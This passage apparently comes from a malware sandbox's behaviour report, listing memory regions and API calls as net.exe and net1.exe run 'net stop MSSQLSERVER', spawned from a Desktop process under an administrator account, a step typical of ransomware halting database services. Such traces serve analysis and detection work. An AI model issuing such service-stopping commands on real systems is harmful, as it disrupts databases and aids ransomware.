0x8a524ddfff entry_point = 0x8a52420000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6049 start_va = 0x8a524e0000 end_va = 0x8a524e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008a524e0000" filename = "" Region: id = 6050 start_va = 0x8a524f0000 end_va = 0x8a524f6fff entry_point = 0x0 region_type = private name = "private_0x0000008a524f0000" filename = "" Region: id = 6051 start_va = 0x8a52500000 end_va = 0x8a52687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008a52500000" filename = "" Region: id = 6052 start_va = 0x8a52690000 end_va = 0x8a5269ffff entry_point = 0x0 region_type = private name = "private_0x0000008a52690000" filename = "" Region: id = 6053 start_va = 0x8a526a0000 end_va = 0x8a52820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008a526a0000" filename = "" Region: id = 6054 start_va = 0x8a52830000 end_va = 0x8a53c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008a52830000" filename = "" Region: id = 6055 start_va = 0x8a53c30000 end_va = 0x8a53c30fff entry_point = 0x0 region_type = private name = "private_0x0000008a53c30000" filename = "" Region: id = 6056 start_va = 0x8a53c40000 end_va = 0x8a53c40fff entry_point = 0x0 region_type = private name = "private_0x0000008a53c40000" filename = "" Region: id = 6057 start_va = 0x7ff6c4370000 end_va = 0x7ff6c446ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4370000" filename = "" Region: id = 6058 start_va = 0x7ff6c449b000 end_va = 0x7ff6c449cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c449b000" filename = "" Region: id = 6059 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6060 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6061 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6062 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6063 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6064 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6065 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6066 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6067 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6068 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6069 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6070 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6071 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6072 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 385 os_tid = 0x394 Thread: id = 386 os_tid = 0xe14 Thread: id = 387 os_tid = 0xe10 Process: id = "100" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x24fb8000" os_pid = "0xe0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "98" os_parent_pid = "0xd18" cmd_line = "net stop MSSQLSERVER" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6086 start_va = 0x40000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 6087 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6088 start_va = 0x70000 end_va = 0x83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 6089 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 6090 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 6091 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 6092 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 6093 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6094 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 6095 start_va = 0x240000 end_va = 0x423ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 6096 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6097 start_va = 0x7ee80000 end_va = 0x7eea2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee80000" filename = "" Region: id = 6098 start_va = 0x7eeab000 end_va = 0x7eeadfff entry_point = 0x0 region_type = private name = "private_0x000000007eeab000" filename = "" Region: id = 6099 start_va = 0x7eeae000 end_va = 0x7eeaefff entry_point = 0x0 region_type = private name = "private_0x000000007eeae000" filename = "" Region: id = 6100 start_va = 0x7eeaf000 end_va = 0x7eeaffff entry_point = 0x0 region_type = private name = "private_0x000000007eeaf000" filename = "" Region: id = 6101 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6102 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6103 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6104 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6105 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6106 start_va = 0x4400000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 6107 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6108 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6109 start_va = 0x45c0000 end_va = 0x46bffff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 6110 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 389 os_tid = 0xe08 Thread: id = 390 os_tid = 0xdf0 Process: id = "101" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x250f4000" os_pid = "0xde0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "100" os_parent_pid = "0xe0c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLSERVER" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6111 start_va = 0xa10000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 6112 start_va = 0xa30000 end_va = 0xa31fff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 6113 start_va = 0xa40000 end_va = 0xa53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 6114 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 6115 start_va = 0xaa0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 6116 start_va = 0xb20000 end_va = 0xb23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 6117 start_va = 0xb30000 end_va = 0xb30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 6118 start_va = 0xb40000 end_va = 0xb41fff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 6119 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 6120 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 6121 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6122 start_va = 0x7f0c0000 end_va = 0x7f0e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0c0000" filename = "" Region: id = 6123 start_va = 0x7f0e3000 end_va = 0x7f0e3fff entry_point = 0x0 region_type = private name = "private_0x000000007f0e3000" filename = "" Region: id = 6124 start_va = 0x7f0e6000 end_va = 0x7f0e6fff entry_point = 0x0 region_type = private name = "private_0x000000007f0e6000" filename = "" Region: id = 6125 start_va = 0x7f0ed000 end_va = 0x7f0effff entry_point = 0x0 region_type = private name = "private_0x000000007f0ed000" filename = "" Region: id = 6126 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6127 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6128 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6129 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6130 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6131 start_va = 0xb50000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 6132 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6133 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6134 start_va = 0xc90000 end_va = 0xd8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 6135 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6136 start_va = 0xa10000 end_va = 0xa1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 6137 start_va = 0xa20000 end_va = 0xa23fff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 6138 start_va = 0xb60000 end_va = 0xc1dfff entry_point = 0xb60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6139 start_va = 0xc20000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 6140 start_va = 0xd90000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 6141 start_va = 0xfd0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 6142 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 6143 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 6144 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 6145 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 6146 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6147 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 6148 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6149 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 6150 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6151 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6152 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6153 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6154 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6155 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6156 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6157 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6158 start_va = 0x7efc0000 end_va = 0x7f0bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efc0000" filename = "" Region: id = 6159 start_va = 0x7f0ea000 end_va = 0x7f0ecfff entry_point = 0x0 region_type = private name = "private_0x000000007f0ea000" filename = "" Region: id = 6160 start_va = 0xa30000 end_va = 0xa33fff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 6161 start_va = 0xc60000 end_va = 0xc62fff entry_point = 0xc60000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 6162 start_va = 0xe10000 end_va = 0xe41fff entry_point = 0xe10000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 391 os_tid = 0xdf4 [0127.966] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0127.966] __set_app_type (_Type=0x1) [0127.966] __p__fmode () returned 0x77ac4d6c [0127.966] __p__commode () returned 0x77ac5b1c [0127.966] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0127.966] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0127.966] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.966] GetConsoleOutputCP () returned 0x1b5 [0127.967] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0127.967] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.969] sprintf_s (in: _DstBuf=0xb1fcf4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0127.969] setlocale (category=0, locale=".437") returned="English_United States.437" [0127.970] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0127.970] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0127.970] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLSERVER" [0127.970] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb1fa9c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0127.970] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xb1fa90 | out: Buffer=0xb1fa90*=0xc98340) returned 0x0 [0127.970] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xb1fa94 | out: Buffer=0xb1fa94*=0xc98400) returned 0x0 [0127.970] __iob_func () returned 0x77ac1208 [0127.971] _fileno (_File=0x77ac1208) returned 0 [0127.971] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0127.971] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0127.971] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0127.971] _wcsicmp (_String1="config", _String2="stop") returned -16 [0127.971] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0127.971] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0127.971] _wcsicmp (_String1="file", _String2="stop") returned -13 [0127.971] _wcsicmp (_String1="files", _String2="stop") returned -13 [0127.971] _wcsicmp (_String1="group", _String2="stop") returned -12 [0127.971] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0127.971] _wcsicmp (_String1="help", _String2="stop") returned -11 [0127.971] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0127.971] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0127.971] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0127.971] _wcsicmp (_String1="session", _String2="stop") returned -15 [0127.971] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0127.971] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0127.971] _wcsicmp (_String1="share", _String2="stop") returned -12 [0127.971] _wcsicmp (_String1="start", _String2="stop") returned -14 [0127.971] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0127.971] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0127.971] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0127.971] _wcsicmp (_String1="accounts", _String2="MSSQLSERVER") returned -12 [0127.971] _wcsicmp (_String1="computer", _String2="MSSQLSERVER") returned -10 [0127.971] _wcsicmp (_String1="config", _String2="MSSQLSERVER") returned -10 [0127.971] _wcsicmp (_String1="continue", _String2="MSSQLSERVER") returned -10 [0127.971] _wcsicmp (_String1="cont", _String2="MSSQLSERVER") returned -10 [0127.971] _wcsicmp (_String1="file", _String2="MSSQLSERVER") returned -7 [0127.971] _wcsicmp (_String1="files", _String2="MSSQLSERVER") returned -7 [0127.971] _wcsicmp (_String1="group", _String2="MSSQLSERVER") returned -6 [0127.971] _wcsicmp (_String1="groups", _String2="MSSQLSERVER") returned -6 [0127.971] _wcsicmp (_String1="help", _String2="MSSQLSERVER") returned -5 [0127.971] _wcsicmp (_String1="helpmsg", _String2="MSSQLSERVER") returned -5 [0127.971] _wcsicmp (_String1="localgroup", _String2="MSSQLSERVER") returned -1 [0127.971] _wcsicmp (_String1="pause", _String2="MSSQLSERVER") returned 3 [0127.971] _wcsicmp (_String1="session", _String2="MSSQLSERVER") returned 6 [0127.971] _wcsicmp (_String1="sessions", _String2="MSSQLSERVER") returned 6 [0127.971] _wcsicmp (_String1="sess", _String2="MSSQLSERVER") returned 6 [0127.971] _wcsicmp (_String1="share", _String2="MSSQLSERVER") returned 6 [0127.971] _wcsicmp (_String1="start", _String2="MSSQLSERVER") returned 6 [0127.971] _wcsicmp (_String1="stats", _String2="MSSQLSERVER") returned 6 [0127.971] _wcsicmp (_String1="statistics", _String2="MSSQLSERVER") returned 6 [0127.971] _wcsicmp (_String1="stop", _String2="MSSQLSERVER") returned 6 [0127.971] _wcsicmp (_String1="time", _String2="MSSQLSERVER") returned 7 [0127.971] _wcsicmp (_String1="user", _String2="MSSQLSERVER") returned 8 [0127.971] _wcsicmp (_String1="users", _String2="MSSQLSERVER") returned 8 [0127.971] _wcsicmp (_String1="msg", _String2="MSSQLSERVER") returned -12 [0127.971] _wcsicmp (_String1="messenger", _String2="MSSQLSERVER") returned -14 [0127.971] _wcsicmp (_String1="receiver", _String2="MSSQLSERVER") returned 5 [0127.971] _wcsicmp (_String1="rcv", _String2="MSSQLSERVER") returned 5 [0127.972] _wcsicmp (_String1="netpopup", _String2="MSSQLSERVER") returned 1 [0127.972] _wcsicmp (_String1="redirector", _String2="MSSQLSERVER") returned 5 [0127.972] _wcsicmp (_String1="redir", _String2="MSSQLSERVER") returned 5 [0127.972] _wcsicmp (_String1="rdr", _String2="MSSQLSERVER") returned 5 [0127.972] _wcsicmp (_String1=0x1081ffc, _String2="MSSQLSERVER") returned 10 [0127.972] _wcsicmp (_String1="work", _String2="MSSQLSERVER") returned 10 [0127.972] _wcsicmp (_String1="wksta", _String2="MSSQLSERVER") returned 10 [0127.972] _wcsicmp (_String1="prdr", _String2="MSSQLSERVER") returned 3 [0127.972] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVER") returned -9 [0127.972] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVER") returned -1 [0127.972] _wcsicmp (_String1="server", _String2="MSSQLSERVER") returned 6 [0127.972] _wcsicmp (_String1="svr", _String2="MSSQLSERVER") returned 6 [0127.972] _wcsicmp (_String1="srv", _String2="MSSQLSERVER") returned 6 [0127.972] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVER") returned -1 [0127.972] _wcsicmp (_String1="alerter", _String2="MSSQLSERVER") returned -12 [0127.972] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVER") returned 1 [0127.972] _wcsupr (in: _String="MSSQLSERVER" | out: _String="MSSQLSERVER") returned="MSSQLSERVER" [0127.972] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xc92630 [0127.974] GetServiceKeyNameW (in: hSCManager=0xc92630, lpDisplayName="MSSQLSERVER", lpServiceName=0x10a8cb0, lpcchBuffer=0xb1fa0c | out: lpServiceName="", lpcchBuffer=0xb1fa0c) returned 0 [0127.974] _wcsicmp (_String1="msg", _String2="MSSQLSERVER") returned -12 [0127.974] _wcsicmp (_String1="messenger", _String2="MSSQLSERVER") returned -14 [0127.974] _wcsicmp (_String1="receiver", _String2="MSSQLSERVER") returned 5 [0127.974] _wcsicmp (_String1="rcv", _String2="MSSQLSERVER") returned 5 [0127.974] _wcsicmp (_String1="redirector", _String2="MSSQLSERVER") returned 5 [0127.974] _wcsicmp (_String1="redir", _String2="MSSQLSERVER") returned 5 [0127.974] _wcsicmp (_String1="rdr", _String2="MSSQLSERVER") returned 5 [0127.974] _wcsicmp (_String1="workstation", _String2="MSSQLSERVER") returned 10 [0127.974] _wcsicmp (_String1="work", _String2="MSSQLSERVER") returned 10 [0127.974] _wcsicmp (_String1="wksta", _String2="MSSQLSERVER") returned 10 [0127.974] _wcsicmp (_String1="prdr", _String2="MSSQLSERVER") returned 3 [0127.974] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVER") returned -9 